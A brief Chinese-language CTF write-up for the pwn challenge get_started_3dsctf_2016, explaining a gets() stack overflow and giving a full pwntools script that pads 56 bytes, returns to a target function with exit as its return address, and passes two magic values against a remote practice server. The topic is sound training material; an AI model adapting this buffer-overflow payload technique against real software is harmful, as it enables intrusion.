get_started_3dsctf_2016

checksec

没有栈保护,应该还是栈溢出

一般是先在main函数查找,看看整体逻辑

找到了get漏洞

注意啊注意!

这里这道题没有缓冲区

这是正常的题,这里有个s

但是这道题!

只有R没有s

这里有一个点,在函数构建的时候,我们返回函数这里是addr,在引用这个函数时,我们要马上接入他的返回函数,这里就是exit,然后再传参,之前的题没有这个因为没有正常结束不会有什么问题

python 复制代码
from pwn import *
ghust = remote("node5.buuoj.cn",26779)
addr= 0x80489A0
exit_addr=0x0804E6A0
a1=814536271
a2=425138641
payload = b'a'*56 +p32(addr)+p32(exit_addr)+p32(a1)+p32(a2)
ghust.sendline(payload)
ghust.interactive()
相关推荐
dddddppppp1232 分钟前
linux sdl图形编程之helloworld.
linux·运维·ffmpeg
qq_479875439 分钟前
TimerFd & Epoll
java·服务器·数据库
做运维的阿瑞20 分钟前
Kubernetes 存储核心理论:深入理解 PVC 静态迁移与动态扩容
运维·容器·kubernetes
小任今晚几点睡37 分钟前
Docker 完整指南:从入门到企业实战
运维·docker·容器
郝学胜-神的一滴39 分钟前
Linux系统函数link、unlink与dentry的关系及使用注意事项
linux·运维·服务器·开发语言·前端·c++
霍格沃兹软件测试开发40 分钟前
借助 Dify 实现自动化工作流,每天节省3小时
运维·ai·自动化
星空的资源小屋1 小时前
RoboIntern,一款自动化办公小助手
运维·人工智能·pdf·自动化·电脑·excel
Pota-to成长日记1 小时前
2025/10/14 redis断联 没有IPv4地址 (自用)
linux·运维·服务器
樱木...1 小时前
Linux 查询目录下文件大小引发的内存溢出问题
linux·运维
TG_yunshuguoji1 小时前
阿里云渠道商:哪些方法能给服务器加速?
服务器·阿里云·云计算